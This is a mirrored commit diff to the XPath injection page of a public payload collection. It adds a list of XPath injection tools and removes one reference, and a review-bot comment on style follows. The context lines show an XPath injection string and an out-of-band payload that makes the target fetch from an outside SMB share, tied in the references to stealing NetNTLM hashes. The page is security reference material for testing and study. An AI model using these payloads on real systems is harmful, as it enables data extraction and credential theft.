mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-18 18:36:10 +00:00
XPATH: add tools
parent
882eec0566
commit
525429c0d8
@ -7,6 +7,7 @@
|
|||||||
* [Exploitation](#exploitation)
|
* [Exploitation](#exploitation)
|
||||||
* [Blind exploitation](#blind-exploitation)
|
* [Blind exploitation](#blind-exploitation)
|
||||||
* [Out Of Band Exploitation](#out-of-band-exploitation)
|
* [Out Of Band Exploitation](#out-of-band-exploitation)
|
||||||
|
* [Tools](#tools)
|
||||||
* [References](#references)
|
* [References](#references)
|
||||||
|
|
||||||
## Exploitation
|
## Exploitation
|
||||||
@ -47,8 +48,15 @@ x' or name()='username' or 'x'='y
|
|||||||
http://example.com/?title=Foundation&type=*&rent_days=* and doc('//10.10.10.10/SHARE')
|
http://example.com/?title=Foundation&type=*&rent_days=* and doc('//10.10.10.10/SHARE')
|
||||||
```
|
```
|
||||||
|
|
||||||
|
## Tools
|
||||||
|
|
||||||
|
- [xcat](https://github.com/orf/xcat) - Automate XPath injection attacks to retrieve documents
|
||||||
|
- [xxxpwn](https://github.com/feakk/xxxpwn) - Advanced XPath Injection Tool
|
||||||
|
- [xxxpwn_smart](https://github.com/aayla-secura/xxxpwn_smart) - A fork of xxxpwn using predictive text
|
||||||
|
- [xpath-blind-explorer](https://github.com/micsoftvn/xpath-blind-explorer)
|
||||||
|
- [XmlChor](https://github.com/Harshal35/XMLCHOR) - Xpath injection exploitation tool
|
||||||
|
|
||||||
## References
|
## References
|
||||||
|
|
||||||
* [OWASP XPATH Injection](https://www.owasp.org/index.php/Testing_for_XPath_Injection_(OTG-INPVAL-010))
|
* [OWASP XPATH Injection](https://www.owasp.org/index.php/Testing_for_XPath_Injection_(OTG-INPVAL-010))
|
||||||
* [XPATH Blind Explorer](http://code.google.com/p/xpath-blind-explorer/)
|
|
||||||
* [Places of Interest in Stealing NetNTLM Hashes - Osanda Malith Jayathissa - March 24, 2017](https://osandamalith.com/2017/03/24/places-of-interest-in-stealing-netntlm-hashes/)
|
* [Places of Interest in Stealing NetNTLM Hashes - Osanda Malith Jayathissa - March 24, 2017](https://osandamalith.com/2017/03/24/places-of-interest-in-stealing-netntlm-hashes/)
|
||||||
|
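Review bot: The `xpath-blind-explorer` entry in the new Tools list is the only one of the five without a description; add a short one in the same `- [name](url) - description` form as its neighbours. The same hunk appears to drop the `XPATH Blind Explorer` (code.google.com) line from References, which the commit message "XPATH: add tools" does not mention, so either note the removal in the message or keep the reference. On style, the new list uses `-` bullets while the table of contents and References use `*`, and "Xpath" in the XmlChor description should read "XPath" to match the other entries.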